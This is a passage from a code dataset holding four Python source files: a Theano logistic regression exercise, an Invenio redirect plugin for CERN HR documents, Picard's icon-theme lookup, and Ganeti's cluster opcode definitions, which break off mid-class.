repo_name
stringlengths
5
104
path
stringlengths
4
248
content
stringlengths
102
99.9k
AthenaYe/UFLDL_Tutorial
Chap1_Supervised_Learning_and_Optimization/logistic_regression.py
#!/usr/bin/env python2.7 # -*- coding:utf-8 -*- import sklearn.datasets as skds import numpy as np import random import theano.tensor as T import theano import matplotlib.pyplot as plt import math #I don't know what the jesus 'housing.data' means so I used self-generated dataset x = np.arange(-50., 50., 1) y = np.array(map(lambda tmp: 1.0/(1 + math.exp(-3 * tmp + 5.0)), x)) noise = np.random.uniform(-0.1, .1, size=len(x)) y += noise print x print y #declarations theta = theano.shared(np.random.uniform(-0.1, 0.1)) omega = theano.shared(np.random.uniform(-0.1, 0.1)) X = T.dscalar('X') Y = T.dscalar('Y') #functions prediction = 1/(1 + T.exp(-omega * X + theta)) loss1 = -Y * T.log(prediction) loss2 = 1/2.0 * (prediction - Y) ** 2 predict = theano.function([X], prediction) calculate_loss = theano.function([X, Y], loss2) print predict(1.0) #derivatives dX = T.grad(loss2, X) dtheta = T.grad(loss2, theta) domega = T.grad(loss2, omega) epsilon = .01 #gradient function gradient_step = theano.function( [X, Y], updates=((omega, omega - epsilon * domega), (theta, theta - epsilon * dtheta))) #optimization for i in range(100): loss = 0 for j in range(len(x)): gradient_step(x[j], y[j]) loss += calculate_loss(x[j], y[j]) print 'loss after' + str(i) + 'iterations.' + str(loss) print x print y mul = 1 - 1/len(x) plt.xlim(x.min() * mul, x.max() * mul) plt.ylim(y.min() * mul, y.max() * mul) plt.xlabel('x') plt.ylabel('y') plt.title('lr test') plt.plot(x, y, 'ro') xx = np.arange(x.min(), x.max(), 0.1) yy = map(lambda abc: predict(abc), xx) plt.plot(xx, yy, 'b') plt.show() # vim: ts=4 sw=4 sts=4 expandtab
PXke/invenio
invenio/modules/redirector/redirect_methods/goto_plugin_cern_hr_documents.py
# -*- coding: utf-8 -*- ## ## This file is part of Invenio. ## Copyright (C) 2012 CERN. ## ## Invenio is free software; you can redistribute it and/or ## modify it under the terms of the GNU General Public License as ## published by the Free Software Foundation; either version 2 of the ## License, or (at your option) any later version. ## ## Invenio is distributed in the hope that it will be useful, but ## WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU ## General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with Invenio; if not, write to the Free Software Foundation, Inc., ## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA. """ This implements a redirection for CERN HR Documents in the CERN Document Server. It's useful as a reference on how goto plugins could be implemented. """ import time import re from invenio.legacy.search_engine import perform_request_search from invenio.legacy.bibrecord import get_fieldvalues from invenio.legacy.bibdocfile.api import BibRecDocs def make_cern_ssr_docname(lang, edition, modif=0): if modif: return "CERN_SSR_%(lang)s_ed%(edition)02d_modif%(modif)02d" % { 'lang': lang, 'edition': edition, 'modif': modif } else: return "CERN_SSR_%(lang)s_ed%(edition)02d" % { 'lang': lang, 'edition': edition, } _RE_REVISION = re.compile(r"rev(\d\d)") def _get_revision(docname): """ Return the revision in a docname. E.g.: CERN_Circ_Op_en_02_rev01_Implementation measures.pdf -> 1 CERN_Circ_Op_en_02_rev02_Implementation measures.PDF -> 2 """ g = _RE_REVISION.search(docname) if g: return int(g.group(1)) return 0 def _register_document(documents, docname, key): """ Register in the documents mapping the docname to key, but only if the docname has a revision higher of the docname already associated with a key """ if key in documents: if _get_revision(docname) > _get_revision(documents[key]): documents[key] = docname else: documents[key] = docname def goto(type, document='', number=0, lang='en', modif=0): today = time.strftime('%Y-%m-%d') if type == 'SSR': ## We would like a CERN Staff Rules and Regulations recids = perform_request_search(cc='Staff Rules and Regulations', f="925__a:1996-01-01->%s 925__b:%s->9999-99-99" % (today, today)) recid = recids[-1] reportnumber = get_fieldvalues(recid, '037__a')[0] edition = int(reportnumber[-2:]) ## e.g. CERN-STAFF-RULES-ED08 return BibRecDocs(recid).get_bibdoc(make_cern_ssr_docname(lang, edition, modif)).get_file('.pdf').get_url() elif type == "OPER-CIRC": recids = perform_request_search(cc="Operational Circulars", p="reportnumber=\"CERN-OPER-CIRC-%s-*\"" % number, sf="925__a") recid = recids[-1] documents = {} bibrecdocs = BibRecDocs(recid) for docname in bibrecdocs.get_bibdoc_names(): ldocname = docname.lower() if 'implementation' in ldocname: _register_document(documents, docname, 'implementation_en') elif 'application' in ldocname: _register_document(documents, docname, 'implementation_fr') elif 'archiving' in ldocname: _register_document(documents, docname, 'archiving_en') elif 'archivage' in ldocname: _register_document(documents, docname, 'archiving_fr') elif 'annexe' in ldocname or 'annexes_fr' in ldocname: _register_document(documents, docname, 'annex_fr') elif 'annexes_en' in ldocname or 'annex' in ldocname: _register_document(documents, docname, 'annex_en') elif '_en_' in ldocname or '_eng_' in ldocname or '_angl_' in ldocname: _register_document(documents, docname, 'en') elif '_fr_' in ldocname: _register_document(documents, docname, 'fr') return bibrecdocs.get_bibdoc(documents[document]).get_file('.pdf').get_url() elif type == 'ADMIN-CIRC': recids = perform_request_search(cc="Administrative Circulars", p="reportnumber=\"CERN-ADMIN-CIRC-%s-*\"" % number, sf="925__a") recid = recids[-1] documents = {} bibrecdocs = BibRecDocs(recid) for docname in bibrecdocs.get_bibdoc_names(): ldocname = docname.lower() if 'implementation' in ldocname: _register_document(documents, docname, 'implementation-en') elif 'application' in ldocname: _register_document(documents, docname, 'implementation-fr') elif 'archiving' in ldocname: _register_document(documents, docname, 'archiving-en') elif 'archivage' in ldocname: _register_document(documents, docname, 'archiving-fr') elif 'annexe' in ldocname or 'annexes_fr' in ldocname: _register_document(documents, docname, 'annex-fr') elif 'annexes_en' in ldocname or 'annex' in ldocname: _register_document(documents, docname, 'annex-en') elif '_en_' in ldocname or '_eng_' in ldocname or '_angl_' in ldocname: _register_document(documents, docname, 'en') elif '_fr_' in ldocname: _register_document(documents, docname, 'fr') return bibrecdocs.get_bibdoc(documents[document]).get_file('.pdf').get_url() def register_hr_redirections(): """ Run this only once """ from invenio.modules.redirector.api import register_redirection plugin = 'goto_plugin_cern_hr_documents' ## Staff rules and regulations for modif in range(1, 20): for lang in ('en', 'fr'): register_redirection('hr-srr-modif%02d-%s' % (modif, lang), plugin, parameters={'type': 'SSR', 'lang': lang, 'modif': modif}) for lang in ('en', 'fr'): register_redirection('hr-srr-%s' % lang, plugin, parameters={'type': 'SSR', 'lang': lang, 'modif': 0}) ## Operational Circulars for number in range(1, 10): for lang in ('en', 'fr'): register_redirection('hr-oper-circ-%s-%s' % (number, lang), plugin, parameters={'type': 'OPER-CIRC', 'document': lang, 'number': number}) for number, special_document in ((2, 'implementation'), (2, 'annex'), (3, 'archiving'), (3, 'annex')): for lang in ('en', 'fr'): register_redirection('hr-circ-%s-%s-%s' % (number, special_document, lang), plugin, parameters={'type': 'OPER-CIRC', 'document': '%s-%s' % (special_document, lang), 'number': number}) ## Administrative Circulars: for number in range(1, 32): for lang in ('en', 'fr'): register_redirection('hr-admin-circ-%s-%s' % (number, lang), plugin, parameters={'type': 'ADMIN-CIRC', 'document': lang, 'number': number}) if __name__ == "__main__": register_hr_redirections()
mineo/picard
picard/util/icontheme.py
# -*- coding: utf-8 -*- # # Picard, the next-generation MusicBrainz tagger # Copyright (C) 2006 Lukáš Lalinský # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. import os.path import sys from PyQt5 import QtGui if sys.platform == 'win32': _search_paths = [] else: _search_paths = [ os.path.expanduser('~/.icons'), os.path.join(os.environ.get('XDG_DATA_DIRS', '/usr/share'), 'icons'), '/usr/share/pixmaps', ] _current_theme = None if 'XDG_CURRENT_DESKTOP' in os.environ: desktop = os.environ['XDG_CURRENT_DESKTOP'].lower() if desktop in ('gnome', 'unity'): _current_theme = (os.popen('gsettings get org.gnome.desktop.interface icon-theme').read().strip()[1:-1] or None) elif os.environ.get('KDE_FULL_SESSION'): _current_theme = (os.popen("kreadconfig --file kdeglobals --group Icons --key Theme --default crystalsvg").read().strip() or None) ICON_SIZE_MENU = ('16x16',) ICON_SIZE_TOOLBAR = ('22x22',) ICON_SIZE_ALL = ('22x22', '16x16') def lookup(name, size=ICON_SIZE_ALL): icon = QtGui.QIcon() if _current_theme: for path in _search_paths: for subdir in ('actions', 'places', 'devices'): fullpath = os.path.join(path, _current_theme, size[0], subdir, name) if os.path.exists(fullpath + '.png'): icon.addFile(fullpath + '.png') for s in size[1:]: icon.addFile(os.path.join(path, _current_theme, s, subdir, name) + '.png') return icon for s in size: icon.addFile('/'.join([':', 'images', s, name]) + '.png') return icon
ekohl/ganeti
lib/opcodes.py
# # # Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011 Google Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA # 02110-1301, USA. """OpCodes module This module implements the data structures which define the cluster operations - the so-called opcodes. Every operation which modifies the cluster state is expressed via opcodes. """ # this are practically structures, so disable the message about too # few public methods: # pylint: disable-msg=R0903 import logging import re import operator from ganeti import constants from ganeti import errors from ganeti import ht # Common opcode attributes #: output fields for a query operation _POutputFields = ("output_fields", ht.NoDefault, ht.TListOf(ht.TNonEmptyString), "Selected output fields") #: the shutdown timeout _PShutdownTimeout = \ ("shutdown_timeout", constants.DEFAULT_SHUTDOWN_TIMEOUT, ht.TPositiveInt, "How long to wait for instance to shut down") #: the force parameter _PForce = ("force", False, ht.TBool, "Whether to force the operation") #: a required instance name (for single-instance LUs) _PInstanceName = ("instance_name", ht.NoDefault, ht.TNonEmptyString, "Instance name") #: Whether to ignore offline nodes _PIgnoreOfflineNodes = ("ignore_offline_nodes", False, ht.TBool, "Whether to ignore offline nodes") #: a required node name (for single-node LUs) _PNodeName = ("node_name", ht.NoDefault, ht.TNonEmptyString, "Node name") #: a required node group name (for single-group LUs) _PGroupName = ("group_name", ht.NoDefault, ht.TNonEmptyString, "Group name") #: Migration type (live/non-live) _PMigrationMode = ("mode", None, ht.TOr(ht.TNone, ht.TElemOf(constants.HT_MIGRATION_MODES)), "Migration mode") #: Obsolete 'live' migration mode (boolean) _PMigrationLive = ("live", None, ht.TMaybeBool, "Legacy setting for live migration, do not use") #: Tag type _PTagKind = ("kind", ht.NoDefault, ht.TElemOf(constants.VALID_TAG_TYPES), None) #: List of tag strings _PTags = ("tags", ht.NoDefault, ht.TListOf(ht.TNonEmptyString), None) _PForceVariant = ("force_variant", False, ht.TBool, "Whether to force an unknown OS variant") _PWaitForSync = ("wait_for_sync", True, ht.TBool, "Whether to wait for the disk to synchronize") _PIgnoreConsistency = ("ignore_consistency", False, ht.TBool, "Whether to ignore disk consistency") _PStorageName = ("name", ht.NoDefault, ht.TMaybeString, "Storage name") _PUseLocking = ("use_locking", False, ht.TBool, "Whether to use synchronization") _PNameCheck = ("name_check", True, ht.TBool, "Whether to check name") _PNodeGroupAllocPolicy = \ ("alloc_policy", None, ht.TOr(ht.TNone, ht.TElemOf(constants.VALID_ALLOC_POLICIES)), "Instance allocation policy") _PGroupNodeParams = ("ndparams", None, ht.TMaybeDict, "Default node parameters for group") _PQueryWhat = ("what", ht.NoDefault, ht.TElemOf(constants.QR_VIA_OP), "Resource(s) to query for") _PIpCheckDoc = "Whether to ensure instance's IP address is inactive" #: Do not remember instance state changes _PNoRemember = ("no_remember", False, ht.TBool, "Do not remember the state change") #: Target node for instance migration/failover _PMigrationTargetNode = ("target_node", None, ht.TMaybeString, "Target node for shared-storage instances") #: OP_ID conversion regular expression _OPID_RE = re.compile("([a-z])([A-Z])") #: Utility function for L{OpClusterSetParams} _TestClusterOsList = ht.TOr(ht.TNone, ht.TListOf(ht.TAnd(ht.TList, ht.TIsLength(2), ht.TMap(ht.WithDesc("GetFirstItem")(operator.itemgetter(0)), ht.TElemOf(constants.DDMS_VALUES))))) # TODO: Generate check from constants.INIC_PARAMS_TYPES #: Utility function for testing NIC definitions _TestNicDef = ht.TDictOf(ht.TElemOf(constants.INIC_PARAMS), ht.TOr(ht.TNone, ht.TNonEmptyString)) _SUMMARY_PREFIX = { "CLUSTER_": "C_", "GROUP_": "G_", "NODE_": "N_", "INSTANCE_": "I_", } def _NameToId(name): """Convert an opcode class name to an OP_ID. @type name: string @param name: the class name, as OpXxxYyy @rtype: string @return: the name in the OP_XXXX_YYYY format """ if not name.startswith("Op"): return None # Note: (?<=[a-z])(?=[A-Z]) would be ideal, since it wouldn't # consume any input, and hence we would just have all the elements # in the list, one by one; but it seems that split doesn't work on # non-consuming input, hence we have to process the input string a # bit name = _OPID_RE.sub(r"\1,\2", name) elems = name.split(",") return "_".join(n.upper() for n in elems) def RequireFileStorage(): """Checks that file storage is enabled. While it doesn't really fit into this module, L{utils} was deemed too large of a dependency to be imported for just one or two functions. @raise errors.OpPrereqError: when file storage is disabled """ if not constants.ENABLE_FILE_STORAGE: raise errors.OpPrereqError("File storage disabled at configure time", errors.ECODE_INVAL) def RequireSharedFileStorage(): """Checks that shared file storage is enabled. While it doesn't really fit into this module, L{utils} was deemed too large of a dependency to be imported for just one or two functions. @raise errors.OpPrereqError: when shared file storage is disabled """ if not constants.ENABLE_SHARED_FILE_STORAGE: raise errors.OpPrereqError("Shared file storage disabled at" " configure time", errors.ECODE_INVAL) @ht.WithDesc("CheckFileStorage") def _CheckFileStorage(value): """Ensures file storage is enabled if used. """ if value == constants.DT_FILE: RequireFileStorage() elif value == constants.DT_SHARED_FILE: RequireSharedFileStorage() return True _CheckDiskTemplate = ht.TAnd(ht.TElemOf(constants.DISK_TEMPLATES), _CheckFileStorage) def _CheckStorageType(storage_type): """Ensure a given storage type is valid. """ if storage_type not in constants.VALID_STORAGE_TYPES: raise errors.OpPrereqError("Unknown storage type: %s" % storage_type, errors.ECODE_INVAL) if storage_type == constants.ST_FILE: RequireFileStorage() return True #: Storage type parameter _PStorageType = ("storage_type", ht.NoDefault, _CheckStorageType, "Storage type") class _AutoOpParamSlots(type): """Meta class for opcode definitions. """ def __new__(mcs, name, bases, attrs): """Called when a class should be created. @param mcs: The meta class @param name: Name of created class @param bases: Base classes @type attrs: dict @param attrs: Class attributes """ assert "__slots__" not in attrs, \ "Class '%s' defines __slots__ when it should use OP_PARAMS" % name assert "OP_ID" not in attrs, "Class '%s' defining OP_ID" % name attrs["OP_ID"] = _NameToId(name) # Always set OP_PARAMS to avoid duplicates in BaseOpCode.GetAllParams params = attrs.setdefault("OP_PARAMS", []) # Use parameter names as slots slots = [pname for (pname, _, _, _) in params] assert "OP_DSC_FIELD" not in attrs or attrs["OP_DSC_FIELD"] in slots, \ "Class '%s' uses unknown field in OP_DSC_FIELD" % name attrs["__slots__"] = slots return type.__new__(mcs, name, bases, attrs) class BaseOpCode(object): """A simple serializable object. This object serves as a parent class for OpCode without any custom field handling. """ # pylint: disable-msg=E1101 # as OP_ID is dynamically defined __metaclass__ = _AutoOpParamSlots def __init__(self, **kwargs): """Constructor for BaseOpCode. The constructor takes only keyword arguments and will set attributes on this object based on the passed arguments. As such, it means that you should not pass arguments which are not in the __slots__ attribute for this class. """ slots = self._all_slots() for key in kwargs: if key not in slots: raise TypeError("Object %s doesn't support the parameter '%s'" % (self.__class__.__name__, key)) setattr(self, key, kwargs[key]) def __getstate__(self): """Generic serializer. This method just returns the contents of the instance as a dictionary. @rtype: C{dict} @return: the instance attributes and their values """ state = {} for name in self._all_slots(): if hasattr(self, name): state[name] = getattr(self, name) return state def __setstate__(self, state): """Generic unserializer. This method just restores from the serialized state the attributes of the current instance. @param state: the serialized opcode data @type state: C{dict} """ if not isinstance(state, dict): raise ValueError("Invalid data to __setstate__: expected dict, got %s" % type(state)) for name in self._all_slots(): if name not in state and hasattr(self, name): delattr(self, name) for name in state: setattr(self, name, state[name]) @classmethod def _all_slots(cls): """Compute the list of all declared slots for a class. """ slots = [] for parent in cls.__mro__: slots.extend(getattr(parent, "__slots__", [])) return slots @classmethod def GetAllParams(cls): """Compute list of all parameters for an opcode. """ slots = [] for parent in cls.__mro__: slots.extend(getattr(parent, "OP_PARAMS", [])) return slots def Validate(self, set_defaults): """Validate opcode parameters, optionally setting default values. @type set_defaults: bool @param set_defaults: Whether to set default values @raise errors.OpPrereqError: When a parameter value doesn't match requirements """ for (attr_name, default, test, _) in self.GetAllParams(): assert test == ht.NoType or callable(test) if not hasattr(self, attr_name): if default == ht.NoDefault: raise errors.OpPrereqError("Required parameter '%s.%s' missing" % (self.OP_ID, attr_name), errors.ECODE_INVAL) elif set_defaults: if callable(default): dval = default() else: dval = default setattr(self, attr_name, dval) if test == ht.NoType: # no tests here continue if set_defaults or hasattr(self, attr_name): attr_val = getattr(self, attr_name) if not test(attr_val): logging.error("OpCode %s, parameter %s, has invalid type %s/value %s", self.OP_ID, attr_name, type(attr_val), attr_val) raise errors.OpPrereqError("Parameter '%s.%s' fails validation" % (self.OP_ID, attr_name), errors.ECODE_INVAL) class OpCode(BaseOpCode): """Abstract OpCode. This is the root of the actual OpCode hierarchy. All clases derived from this class should override OP_ID. @cvar OP_ID: The ID of this opcode. This should be unique amongst all children of this class. @cvar OP_DSC_FIELD: The name of a field whose value will be included in the string returned by Summary(); see the docstring of that method for details). @cvar OP_PARAMS: List of opcode attributes, the default values they should get if not already defined, and types they must match. @cvar WITH_LU: Boolean that specifies whether this should be included in mcpu's dispatch table @ivar dry_run: Whether the LU should be run in dry-run mode, i.e. just the check steps @ivar priority: Opcode priority for queue """ # pylint: disable-msg=E1101 # as OP_ID is dynamically defined WITH_LU = True OP_PARAMS = [ ("dry_run", None, ht.TMaybeBool, "Run checks only, don't execute"), ("debug_level", None, ht.TOr(ht.TNone, ht.TPositiveInt), "Debug level"), ("priority", constants.OP_PRIO_DEFAULT, ht.TElemOf(constants.OP_PRIO_SUBMIT_VALID), "Opcode priority"), ] def __getstate__(self): """Specialized getstate for opcodes. This method adds to the state dictionary the OP_ID of the class, so that on unload we can identify the correct class for instantiating the opcode. @rtype: C{dict} @return: the state as a dictionary """ data = BaseOpCode.__getstate__(self) data["OP_ID"] = self.OP_ID return data @classmethod def LoadOpCode(cls, data): """Generic load opcode method. The method identifies the correct opcode class from the dict-form by looking for a OP_ID key, if this is not found, or its value is not available in this module as a child of this class, we fail. @type data: C{dict} @param data: the serialized opcode """ if not isinstance(data, dict): raise ValueError("Invalid data to LoadOpCode (%s)" % type(data)) if "OP_ID" not in data: raise ValueError("Invalid data to LoadOpcode, missing OP_ID") op_id = data["OP_ID"] op_class = None if op_id in OP_MAPPING: op_class = OP_MAPPING[op_id] else: raise ValueError("Invalid data to LoadOpCode: OP_ID %s unsupported" % op_id) op = op_class() new_data = data.copy() del new_data["OP_ID"] op.__setstate__(new_data) return op def Summary(self): """Generates a summary description of this opcode. The summary is the value of the OP_ID attribute (without the "OP_" prefix), plus the value of the OP_DSC_FIELD attribute, if one was defined; this field should allow to easily identify the operation (for an instance creation job, e.g., it would be the instance name). """ assert self.OP_ID is not None and len(self.OP_ID) > 3 # all OP_ID start with OP_, we remove that txt = self.OP_ID[3:] field_name = getattr(self, "OP_DSC_FIELD", None) if field_name: field_value = getattr(self, field_name, None) if isinstance(field_value, (list, tuple)): field_value = ",".join(str(i) for i in field_value) txt = "%s(%s)" % (txt, field_value) return txt def TinySummary(self): """Generates a compact summary description of the opcode. """ assert self.OP_ID.startswith("OP_") text = self.OP_ID[3:] for (prefix, supplement) in _SUMMARY_PREFIX.items(): if text.startswith(prefix): return supplement + text[len(prefix):] return text # cluster opcodes class OpClusterPostInit(OpCode): """Post cluster initialization. This opcode does not touch the cluster at all. Its purpose is to run hooks after the cluster has been initialized. """ class OpClusterDestroy(OpCode): """Destroy the cluster. This opcode has no other parameters. All the state is irreversibly lost after the execution of this opcode. """ class OpClusterQuery(OpCode): """Query cluster information.""" class OpClusterVerifyConfig(OpCode): """Verify the cluster config. """ OP_PARAMS = [ ("verbose", False, ht.TBool, None), ("error_codes", False, ht.TBool, None), ("debug_simulate_errors", False, ht.TBool, None), ] class OpClusterVerifyGroup(OpCode): """Run verify on a node group from the cluster. @type skip_checks: C{list} @ivar skip_checks: steps to be skipped from the verify process; this needs to be a subset of L{constants.VERIFY_OPTIONAL_CHECKS}; currently only L{constants.VERIFY_NPLUSONE_MEM} can be passed """ OP_DSC_FIELD = "group_name" OP_PARAMS = [ ("group_name", ht.NoDefault, ht.TNonEmptyString, None), ("skip_checks", ht.EmptyList, ht.TListOf(ht.TElemOf(constants.VERIFY_OPTIONAL_CHECKS)), None), ("verbose", False, ht.TBool, None), ("error_codes", False, ht.TBool, None), ("debug_simulate_errors", False, ht.TBool, None), ] class OpClusterVerifyDisks(OpCode): """Verify the cluster disks. Parameters: none Result: a tuple of four elements: - list of node names with bad data returned (unreachable, etc.) - dict of node names with broken volume groups (values: error msg) - list of instances with degraded disks (that should be activated) - dict of instances with missing logical volumes (values: (node, vol) pairs with details about the missing volumes) In normal operation, all lists should be empty. A non-empty instance list (3rd element of the result) is still ok (errors were fixed) but non-empty node list means some node is down, and probably there are unfixable drbd errors. Note that only instances that are drbd-based are taken into consideration. This might need to be revisited in the future. """ class OpClusterRepairDiskSizes(OpCode): """Verify the disk sizes of the instances and fixes configuration mimatches. Parameters: optional instances list, in case we want to restrict the checks to only a subset of the instances. Result: a list of tuples, (instance, disk, new-size) for changed configurations. In normal operation, the list should be empty. @type instances: list @ivar instances: the list of instances to check, or empty for all instances """ OP_PARAMS = [ ("instances", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), None), ] class OpClusterConfigQuery(OpCode): """Query cluster configuration values.""" OP_PARAMS = [ _POutputFields ] class OpClusterRename(OpCode): """Rename the cluster. @type name: C{str} @ivar name: The new name of the cluster. The name and/or the master IP address will be changed to match the new name and its IP address. """ OP_DSC_FIELD = "name" OP_PARAMS = [ ("name", ht.NoDefault, ht.TNonEmptyString, None), ] class OpClusterSetParams(OpCode): """Change the parameters of the cluster. @type vg_name: C{str} or C{None} @ivar vg_name: The new volume group name or None to disable LVM usage. """ OP_PARAMS = [ ("vg_name", None, ht.TMaybeString, "Volume group name"), ("enabled_hypervisors", None, ht.TOr(ht.TAnd(ht.TListOf(ht.TElemOf(constants.HYPER_TYPES)), ht.TTrue), ht.TNone), "List of enabled hypervisors"), ("hvparams", None, ht.TOr(ht.TDictOf(ht.TNonEmptyString, ht.TDict), ht.TNone), "Cluster-wide hypervisor parameter defaults, hypervisor-dependent"), ("beparams", None, ht.TOr(ht.TDict, ht.TNone), "Cluster-wide backend parameter defaults"), ("os_hvp", None, ht.TOr(ht.TDictOf(ht.TNonEmptyString, ht.TDict), ht.TNone), "Cluster-wide per-OS hypervisor parameter defaults"), ("osparams", None, ht.TOr(ht.TDictOf(ht.TNonEmptyString, ht.TDict), ht.TNone), "Cluster-wide OS parameter defaults"), ("candidate_pool_size", None, ht.TOr(ht.TStrictPositiveInt, ht.TNone), "Master candidate pool size"), ("uid_pool", None, ht.NoType, "Set UID pool, must be list of lists describing UID ranges (two items," " start and end inclusive)"), ("add_uids", None, ht.NoType, "Extend UID pool, must be list of lists describing UID ranges (two" " items, start and end inclusive) to be added"), ("remove_uids", None, ht.NoType, "Shrink UID pool, must be list of lists describing UID ranges (two" " items, start and end inclusive) to be removed"), ("maintain_node_health", None, ht.TMaybeBool, "Whether to automatically maintain node health"), ("prealloc_wipe_disks", None, ht.TMaybeBool, "Whether to wipe disks before allocating them to instances"), ("nicparams", None, ht.TMaybeDict, "Cluster-wide NIC parameter defaults"), ("ndparams", None, ht.TMaybeDict, "Cluster-wide node parameter defaults"), ("drbd_helper", None, ht.TOr(ht.TString, ht.TNone), "DRBD helper program"), ("default_iallocator", None, ht.TOr(ht.TString, ht.TNone), "Default iallocator for cluster"), ("master_netdev", None, ht.TOr(ht.TString, ht.TNone), "Master network device"), ("reserved_lvs", None, ht.TOr(ht.TListOf(ht.TNonEmptyString), ht.TNone), "List of reserved LVs"), ("hidden_os", None, _TestClusterOsList, "Modify list of hidden operating systems. Each modification must have" " two items, the operation and the OS name. The operation can be" " ``%s`` or ``%s``." % (constants.DDM_ADD, constants.DDM_REMOVE)), ("blacklisted_os", None, _TestClusterOsList, "Modify list of blacklisted operating systems. Each modification must have" " two items, the operation and the OS name. The operation can be" " ``%s`` or ``%s``." % (constants.DDM_ADD, constants.DDM_REMOVE)), ] class OpClusterRedistConf(OpCode): """Force a full push of the cluster configuration. """ class OpQuery(OpCode): """Query for resources/items. @ivar what: Resources to query for, must be one of L{constants.QR_VIA_OP} @ivar fields: List of fields to retrieve @ivar filter: Query filter """ OP_PARAMS = [ _PQueryWhat, ("fields", ht.NoDefault, ht.TListOf(ht.TNonEmptyString), "Requested fields"), ("filter", None, ht.TOr(ht.TNone, ht.TListOf), "Query filter"), ] class OpQueryFields(OpCode): """Query for available resource/item fields. @ivar what: Resources to query for, must be one of L{constants.QR_VIA_OP} @ivar fields: List of fields to retrieve """ OP_PARAMS = [ _PQueryWhat, ("fields", None, ht.TOr(ht.TNone, ht.TListOf(ht.TNonEmptyString)), "Requested fields; if not given, all are returned"), ] class OpOobCommand(OpCode): """Interact with OOB.""" OP_PARAMS = [ ("node_names", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "List of nodes to run the OOB command against"), ("command", None, ht.TElemOf(constants.OOB_COMMANDS), "OOB command to be run"), ("timeout", constants.OOB_TIMEOUT, ht.TInt, "Timeout before the OOB helper will be terminated"), ("ignore_status", False, ht.TBool, "Ignores the node offline status for power off"), ("power_delay", constants.OOB_POWER_DELAY, ht.TPositiveFloat, "Time in seconds to wait between powering on nodes"), ] # node opcodes class OpNodeRemove(OpCode): """Remove a node. @type node_name: C{str} @ivar node_name: The name of the node to remove. If the node still has instances on it, the operation will fail. """ OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, ] class OpNodeAdd(OpCode): """Add a node to the cluster. @type node_name: C{str} @ivar node_name: The name of the node to add. This can be a short name, but it will be expanded to the FQDN. @type primary_ip: IP address @ivar primary_ip: The primary IP of the node. This will be ignored when the opcode is submitted, but will be filled during the node add (so it will be visible in the job query). @type secondary_ip: IP address @ivar secondary_ip: The secondary IP of the node. This needs to be passed if the cluster has been initialized in 'dual-network' mode, otherwise it must not be given. @type readd: C{bool} @ivar readd: Whether to re-add an existing node to the cluster. If this is not passed, then the operation will abort if the node name is already in the cluster; use this parameter to 'repair' a node that had its configuration broken, or was reinstalled without removal from the cluster. @type group: C{str} @ivar group: The node group to which this node will belong. @type vm_capable: C{bool} @ivar vm_capable: The vm_capable node attribute @type master_capable: C{bool} @ivar master_capable: The master_capable node attribute """ OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, ("primary_ip", None, ht.NoType, "Primary IP address"), ("secondary_ip", None, ht.TMaybeString, "Secondary IP address"), ("readd", False, ht.TBool, "Whether node is re-added to cluster"), ("group", None, ht.TMaybeString, "Initial node group"), ("master_capable", None, ht.TMaybeBool, "Whether node can become master or master candidate"), ("vm_capable", None, ht.TMaybeBool, "Whether node can host instances"), ("ndparams", None, ht.TMaybeDict, "Node parameters"), ] class OpNodeQuery(OpCode): """Compute the list of nodes.""" OP_PARAMS = [ _POutputFields, _PUseLocking, ("names", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Empty list to query all nodes, node names otherwise"), ] class OpNodeQueryvols(OpCode): """Get list of volumes on node.""" OP_PARAMS = [ _POutputFields, ("nodes", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Empty list to query all nodes, node names otherwise"), ] class OpNodeQueryStorage(OpCode): """Get information on storage for node(s).""" OP_PARAMS = [ _POutputFields, _PStorageType, ("nodes", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "List of nodes"), ("name", None, ht.TMaybeString, "Storage name"), ] class OpNodeModifyStorage(OpCode): """Modifies the properies of a storage unit""" OP_PARAMS = [ _PNodeName, _PStorageType, _PStorageName, ("changes", ht.NoDefault, ht.TDict, "Requested changes"), ] class OpRepairNodeStorage(OpCode): """Repairs the volume group on a node.""" OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, _PStorageType, _PStorageName, _PIgnoreConsistency, ] class OpNodeSetParams(OpCode): """Change the parameters of a node.""" OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, _PForce, ("master_candidate", None, ht.TMaybeBool, "Whether the node should become a master candidate"), ("offline", None, ht.TMaybeBool, "Whether the node should be marked as offline"), ("drained", None, ht.TMaybeBool, "Whether the node should be marked as drained"), ("auto_promote", False, ht.TBool, "Whether node(s) should be promoted to master candidate if necessary"), ("master_capable", None, ht.TMaybeBool, "Denote whether node can become master or master candidate"), ("vm_capable", None, ht.TMaybeBool, "Denote whether node can host instances"), ("secondary_ip", None, ht.TMaybeString, "Change node's secondary IP address"), ("ndparams", None, ht.TMaybeDict, "Set node parameters"), ("powered", None, ht.TMaybeBool, "Whether the node should be marked as powered"), ] class OpNodePowercycle(OpCode): """Tries to powercycle a node.""" OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, _PForce, ] class OpNodeMigrate(OpCode): """Migrate all 